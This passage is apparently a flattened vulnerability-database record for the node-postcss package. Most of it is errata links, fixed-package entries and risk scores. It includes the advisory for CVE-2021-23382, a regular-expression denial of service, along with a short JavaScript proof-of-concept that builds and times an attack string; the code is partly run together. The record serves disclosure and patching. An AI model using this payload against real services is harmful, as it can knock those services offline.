13
reference_url https://access.redhat.com/errata/RHSA-2025:0079
reference_id RHSA-2025:0079
reference_type
scores
url https://access.redhat.com/errata/RHSA-2025:0079
14
reference_url https://access.redhat.com/errata/RHSA-2025:0082
reference_id RHSA-2025:0082
reference_type
scores
url https://access.redhat.com/errata/RHSA-2025:0082
15
reference_url https://access.redhat.com/errata/RHSA-2025:0340
reference_id RHSA-2025:0340
reference_type
scores
url https://access.redhat.com/errata/RHSA-2025:0340
16
reference_url https://access.redhat.com/errata/RHSA-2025:0654
reference_id RHSA-2025:0654
reference_type
scores
url https://access.redhat.com/errata/RHSA-2025:0654
17
reference_url https://access.redhat.com/errata/RHSA-2025:0723
reference_id RHSA-2025:0723
reference_type
scores
url https://access.redhat.com/errata/RHSA-2025:0723
18
reference_url https://access.redhat.com/errata/RHSA-2025:0778
reference_id RHSA-2025:0778
reference_type
scores
url https://access.redhat.com/errata/RHSA-2025:0778
19
reference_url https://access.redhat.com/errata/RHSA-2025:0785
reference_id RHSA-2025:0785
reference_type
scores
url https://access.redhat.com/errata/RHSA-2025:0785
20
reference_url https://access.redhat.com/errata/RHSA-2025:0851
reference_id RHSA-2025:0851
reference_type
scores
url https://access.redhat.com/errata/RHSA-2025:0851
21
reference_url https://access.redhat.com/errata/RHSA-2025:0875
reference_id RHSA-2025:0875
reference_type
scores
url https://access.redhat.com/errata/RHSA-2025:0875
22
reference_url https://access.redhat.com/errata/RHSA-2025:0892
reference_id RHSA-2025:0892
reference_type
scores
url https://access.redhat.com/errata/RHSA-2025:0892
23
reference_url https://access.redhat.com/errata/RHSA-2025:1051
reference_id RHSA-2025:1051
reference_type
scores
url https://access.redhat.com/errata/RHSA-2025:1051
24
reference_url https://access.redhat.com/errata/RHSA-2025:1448
reference_id RHSA-2025:1448
reference_type
scores
url https://access.redhat.com/errata/RHSA-2025:1448
25
reference_url https://access.redhat.com/errata/RHSA-2025:2652
reference_id RHSA-2025:2652
reference_type
scores
url https://access.redhat.com/errata/RHSA-2025:2652
26
reference_url https://access.redhat.com/errata/RHSA-2025:3368
reference_id RHSA-2025:3368
reference_type
scores
url https://access.redhat.com/errata/RHSA-2025:3368
27
reference_url https://access.redhat.com/errata/RHSA-2025:3374
reference_id RHSA-2025:3374
reference_type
scores
url https://access.redhat.com/errata/RHSA-2025:3374
28
reference_url https://access.redhat.com/errata/RHSA-2025:3397
reference_id RHSA-2025:3397
reference_type
scores
url https://access.redhat.com/errata/RHSA-2025:3397
29
reference_url https://access.redhat.com/errata/RHSA-2026:2737
reference_id RHSA-2026:2737
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:2737
30
reference_url https://access.redhat.com/errata/RHSA-2026:3406
reference_id RHSA-2026:3406
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:3406
fixed_packages
0
url pkg:deb/debian/node-postcss@8.4.20%2B~cs8.0.23-1%2Bdeb12u1
purl pkg:deb/debian/node-postcss@8.4.20%2B~cs8.0.23-1%2Bdeb12u1
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-postcss@8.4.20%252B~cs8.0.23-1%252Bdeb12u1
aliases CVE-2024-55565, GHSA-mwcw-c2x4-8c55
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-s6f3-3mxh-ekfr
4
url VCID-scy5-ccf9-dygp
vulnerability_id VCID-scy5-ccf9-dygp
summary 
Regular Expression Denial of Service in postcss
The package postcss versions before 7.0.36 or between 8.0.0 and 8.2.13 are vulnerable to Regular Expression Denial of Service (ReDoS) via getAnnotationURL() and loadAnnotation() in lib/previous-map.js. The vulnerable regexes are caused mainly by the sub-pattern 
```regex
\/\*\s* sourceMappingURL=(.*)
```

### PoC
```js
var postcss = require("postcss")
function build_attack(n) {
    var ret = "a{}"
    for (var i = 0; i < n; i++) {
        ret += "/*# sourceMappingURL="
    }
    return ret + "!";
}
```
```js
postcss.parse('a{}/*# sourceMappingURL=a.css.map */') for (var i = 1; i <= 500000; i++) {
    if (i % 1000 == 0) {
        var time = Date.now();
        var attack_str = build_attack(i) try {
            postcss.parse(attack_str) var time_cost = Date.now() - time;
            console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
        } catch (e) {
            var time_cost = Date.now() - time;
            console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
        }
    }
}
```
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-23382.json
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-23382.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2021-23382
reference_id
reference_type
scores
0
value 0.00071
scoring_system epss
scoring_elements 0.21483
published_at 2026-04-24T12:55:00Z
1
value 0.00071
scoring_system epss
scoring_elements 0.21803
published_at 2026-04-02T12:55:00Z
2
value 0.00071
scoring_system epss
scoring_elements 0.21856
published_at 2026-04-04T12:55:00Z
3
value 0.00071
scoring_system epss
scoring_elements 0.2161
published_at 2026-04-07T12:55:00Z
4
value 0.00071
scoring_system epss
scoring_elements 0.21686
published_at 2026-04-08T12:55:00Z
5
value 0.00071
scoring_system epss
scoring_elements 0.21743
published_at 2026-04-09T12:55:00Z
6
value 0.00071
scoring_system epss
scoring_elements 0.21754
published_at 2026-04-11T12:55:00Z
7
value 0.00071
scoring_system epss
scoring_elements 0.21714
published_at 2026-04-12T12:55:00Z
8
value 0.00071
scoring_system epss
scoring_elements 0.21658
published_at 2026-04-13T12:55:00Z
9
value 0.00071
scoring_system epss
scoring_elements 0.21656
published_at 2026-04-16T12:55:00Z
10
value 0.00071
scoring_system epss
scoring_elements 0.21663
published_at 2026-04-18T12:55:00Z
11
value 0.00071
scoring_system epss
scoring_elements 0.21631
published_at 2026-04-21T12:55:00Z
12
value 0.00071
scoring_system epss
scoring_elements 0.21632
published_at 2026-04-01T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2021-23382
2
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23382
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23382
3
reference_url https://github.com/postcss/postcss/commit/2b1d04c867995e55124e0a165b7c6622c1735956
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/postcss/postcss/commit/2b1d04c867995e55124e0a165b7c6622c1735956
4
reference_url https://github.com/postcss/postcss/releases/tag/7.0.36
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/postcss/postcss/releases/tag/7.0.36
5
reference_url https://nvd.nist.gov/vuln/detail/CVE-2021-23382
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2021-23382
6
reference_url https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1255641
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1255641
7
reference_url https://snyk.io/vuln/SNYK-JS-POSTCSS-1255640
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://snyk.io/vuln/SNYK-JS-POSTCSS-1255640
8
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=1954150
reference_id 1954150
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=1954150
9
reference_url https://github.com/advisories/GHSA-566m-qj78-rww5
reference_id GHSA-566m-qj78-rww5
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-566m-qj78-rww5
10
reference_url https://access.redhat.com/errata/RHSA-2021:2438
reference_id RHSA-2021:2438
reference_type
scores
url https://access.redhat.com/errata/RHSA-2021:2438
11
reference_url https://access.redhat.com/errata/RHSA-2021:3917
reference_id RHSA-2021:3917
reference_type
scores
url https://access.redhat.com/errata/RHSA-2021:3917
fixed_packages
0
url pkg:deb/debian/node-postcss@8.2.1%2B~cs5.3.23-8
purl pkg:deb/debian/node-postcss@8.2.1%2B~cs5.3.23-8
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-7cky-3c29-zyar
1
vulnerability VCID-f8u5-8mj5-7yc6
2
vulnerability VCID-s6f3-3mxh-ekfr
resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-postcss@8.2.1%252B~cs5.3.23-8
aliases CVE-2021-23382, GHSA-566m-qj78-rww5
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-scy5-ccf9-dygp
Fixing_vulnerabilities
Risk_score3.1
Resource_urlhttp://public2.vulnerablecode.io/packages/pkg:deb/debian/node-postcss@6.0.23-1